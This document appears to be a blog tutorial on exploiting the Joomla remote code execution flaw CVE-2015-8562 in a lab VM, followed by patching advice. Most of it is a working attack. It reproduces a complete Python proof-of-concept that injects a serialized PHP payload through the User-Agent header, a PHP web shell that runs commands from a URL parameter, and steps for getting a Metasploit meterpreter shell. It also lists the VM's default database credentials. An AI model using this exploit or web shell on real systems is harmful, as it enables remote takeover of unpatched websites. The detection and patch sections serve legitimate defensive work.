<a href="https://www.exploit-db.com/exploits/38977/">https://www.exploit-db.com/exploits/38977/</a><br />
<span style="font-family: Courier New;">”’<br />
</span><br />
<span style="font-family: Courier New;"> Simple PoC for Joomla Object Injection.<br />
</span><br />
<span style="font-family: Courier New;"> Gary @ Sec-1 ltd<br />
</span><br />
<span style="font-family: Courier New;"> http://www.sec-1.com/<br />
</span><br />
<span style="font-family: Courier New;">”’<br />
</span><br />
<span style="font-family: Courier New;">import requests # easy_install requests<br />
</span><br />
<span style="font-family: Courier New;">def get_url(url, user_agent):<br />
</span><br />
<span style="font-family: Courier New;"> headers = {<br />
</span><br />
<span style="font-family: Courier New;"> ‘User-Agent’: user_agent<br />
</span><br />
<span style="font-family: Courier New;"> }<br />
</span><br />
<span style="font-family: Courier New;"> cookies = requests.get(url,headers=headers).cookies<br />
</span><br />
<span style="font-family: Courier New;"> for _ in range(3):<br />
</span><br />
<span style="font-family: Courier New;"> response = requests.get(url, headers=headers,cookies=cookies)<br />
</span><br />
<span style="font-family: Courier New;"> return response<br />
</span><br />
<span style="font-family: Courier New;">def php_str_noquotes(data):<br />
</span><br />
<span style="font-family: Courier New;"> “Convert string to chr(xx).chr(xx) for use in php”<br />
</span><br />
<span style="font-family: Courier New;"> encoded = “”<br />
</span><br />
<span style="font-family: Courier New;"> for char in data:<br />
</span><br />
<span style="font-family: Courier New;"> encoded += “chr({0}).”.format(ord(char))<br />
</span><br />
<span style="font-family: Courier New;"> return encoded[:-1]<br />
</span><br />
<span style="font-family: Courier New;">def generate_payload(php_payload):<br />
</span><br />
<span style="font-family: Courier New;"> php_payload = “eval({0})”.format(php_str_noquotes(php_payload))<br />
</span><br />
<span style="font-family: Courier New;"> terminate = ‘\xf0\xfd\xfd\xfd’;<br />
</span><br />
<span style="font-family: Courier New;"> exploit_template =
r”’}__test|O:21:”JDatabaseDriverMysqli”:3:{s:2:”fc”;O:17:”JSimplepieFactory”:0:{}s:21:”\0\0\0disconnectHandlers”;a:1:{i:0;a:2:{i:0;O:9:”SimplePie”:5:{s:8:”sanitize”;O:20:”JDatabaseDriverMysql”:0:{}s:8:”feed_url”;”’<br />
</span><br />
<span style="font-family: Courier New;"> injected_payload = “{};JFactory::getConfig();exit”.format(php_payload)<br />
</span><br />
<span style="font-family: Courier New;"> exploit_template += r”’s:{0}:”{1}””’.format(str(len(injected_payload)), injected_payload)<br />
</span><br />
<span style="font-family: Courier New;"> exploit_template +=
r”’;s:19:”cache_name_function”;s:6:”assert”;s:5:”cache”;b:1;s:11:”cache_class”;O:20:”JDatabaseDriverMysql”:0:{}}i:1;s:4:”init”;}}s:13:”\0\0\0connection”;b:1;}”’
+ terminate<br />
</span><br />
<span style="font-family: Courier New;"> return exploit_template<br />
</span><br />
<span style="font-family: Courier New;">pl = generate_payload(“system(‘touch /tmp/fx’);”)<br />
</span><br />
<span style="font-family: Courier New;">print get_url(“http://172.31.6.242/”, pl)<br />
</span><br />
It’s a POC exploit which creates a file inside “/tmp” folder of the target server.<br />
To test this exploit, just modify the last line with your target application’s path.<br />
If you are using the VM provided, it should be “http://<IP Address>/joomla/”<br />
In my case, it is<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC5.png" /><span style="font-family: Courier New;"><br />
</span></div>
We are ready to test the exploit. Just run it using the following command from your Kali Linux.<br />
<span style="font-family: Courier New;">python joomla_poc.py<br />
</span><br />
This should create a new file with the name “fx” on the target system within “/tmp” folder. This is shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC6.png" /></div>
Now, let’s make some minor modifications to this exploit to upload a
shell on to the target server. Before we upload a shell, let’s see if
the target webserver path is writable. So, modify the exploit as shown
below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC7.png" /></div>
The above image shows how we can add a file named “shell.php” with the following code.<br />
<span style="font-family: Courier New;"><?php<br />
</span><br />
<span style="font-family: Courier New;">phpinfo();<br />
</span><br />
<span style="font-family: Courier New;">?><br />
</span><br />
Now, access the file “shell.php” to see if it is created.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC8.png" /></div>
It worked. So, we can also add any other file.<br />
Let’s add another file to get a shell on the server. Modify the exploit as shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC9.png" /><span style="background-color: #fdfdfd;"><br />
</span></div>
This adds the file <b>“shell.php”</b> with following code to the server.<br />
<span style="font-family: Courier New;"><?php<br />
</span><br />
<span style="font-family: Courier New;">$cmd=$_GET[‘cmd’];<br />
</span><br />
<span style="font-family: Courier New;">echo system($cmd);<br />
</span><br />
<span style="font-family: Courier New;">?><br />
</span><br />
Let’s use our shell now.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC10.png" /></div>
As we can see in the above figure, we are able to run shell commands.<br />
<b>Note</b>: For demonstration purposes, I am directly
using the webserver path but it may not be possible in all the cases if
the target directory is not writable (The VM used is the default
installation and I didn’t add any explicit write permissions). But, it
is not hard to circumvent this as we can get an interactive shell using
many other ways. You may check this <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">link</a> for more details on this.<br />
While you are running the exploit on your attacking machine, fire up
your wireshark and capture the packets on your working interface (in my
case, eth1 – HostOnly Adapter) to see what’s happening when you run this
exploit.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC11.png" /></div>
Opening up the “follow tcp stream” of our first http packet in the
above traffic capture, we can see the payload being sent using
“User-Agent” header.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC12.png" /></div>
<h1>
Exploitation with Metasploit:</h1>
As usual, Metasploit has released an exploit for this and made our
lives easier. The following figure shows the “Metasploit way” of
exploiting this target.<br />
First, you need to add this exploit to your Metasploit framework in order to do follow the steps.<br />
If you don’t know how to add it, here’s how.<br />
<ol>
<li>Download the exploit into your kali machine from this <a href="https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb">link</a>.</li>
<li>Add it to <b>“/usr/share/metasploit-framework/modules/exploits/multi/http/</b>“</li>
<li>Open up your Metasploit console and type “<b>reload_all</b>“.</li>
</ol>
After adding the exploit, it is pretty straight forward to use it in Metasploit.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC13.png" /></div>
<div style="text-align: left;">
Once you set all the required options, you should see a meterpreter shell popping up as shown below.</div>
<div style="text-align: center;">
<img alt="" class="aligncenter" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC14.png" /></div>
Once again, Metasploit does the same as what we have seen with
wireshark. This time, lets go and check our database entries before and
after exploitation.<br />
Note: I deleted all the content from the “joomla_session” table
before running metasploit so we can see how it is exploiting the target.<br />
In the VM provided, following are the MySQL credentials.<br />
Username: root<br />
Password: toor<br />
“joomla_session” is the table which holds the session data. “data” is the column to be precise.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC15.png" /></div>
The above figure shows the column names of the “joomla_session” table. “data” is what we are interested in.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC16.png" /></div>
The above figure shows session data before running the exploit. Notice that the User-Agent information is saved in the database.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC17.png" /></div>
The above figure shows the session data after running the exploit. If
you closely observe the entries, there are signs that the payload has
been inserted.<br />
<h1>
What to do now???</h1>
If you own a Joomla! Website, go and check if it is vulnerable. You can use the following online service.<br />
<a href="https://scan.patrolserver.com/joomla/CVE-2015-8562">https://scan.patrolserver.com/joomla/CVE-2015-8562</a><br />
<img alt="" class="aligncenter" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC18.png" /><br />
If it is vulnerable, time to patch it.<br />
[<span class="lG">pardot</span>-form id=”19510″ title=”OenTechnation”]<br />
<h1>
How to patch:</h1>
<h2>
Joomla versions 1.5.x and 2.5.x (EOL)</h2>
If you are using the old and unsupported versions 1.5.x or 2.5.x, you
have to apply these hotfixes released by the Joomla development team.<br />
1.5.x: <a href="https://github.com/joomla/joomla-cms/releases/download/3.4.6/SessionFix15v2.zip" target="_blank">Session Fix Joomla 1.5.x</a><br />
2.5.x: <a href="https://github.com/joomla/joomla-cms/releases/download/3.4.6/SessionFix25v1.zip" target="_blank">Session Fix Joomla 2.5.x</a><br />
<h2>
Joomla versions 3.x</h2>
Update immediately to version 3.4.6.<br />
Note: These work arounds have been taken from the above mentioned online scanning website (<a href="https://scan.patrolserver.com/joomla/CVE-2015-8562">https://scan.patrolserver.com/joomla/CVE-2015-8562</a><br />
<span style="background-color: #fdfdfd; font-family: Arial; font-size: 11pt;">).<br />
</span><br />
<h1>
References:</h1>
<a href="https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html">https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html</a><br />
<a href="http://pastebin.com/PRiK0SWL">http://pastebin.com/PRiK0SWL</a><br />
<a href="https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb">https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb</a></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0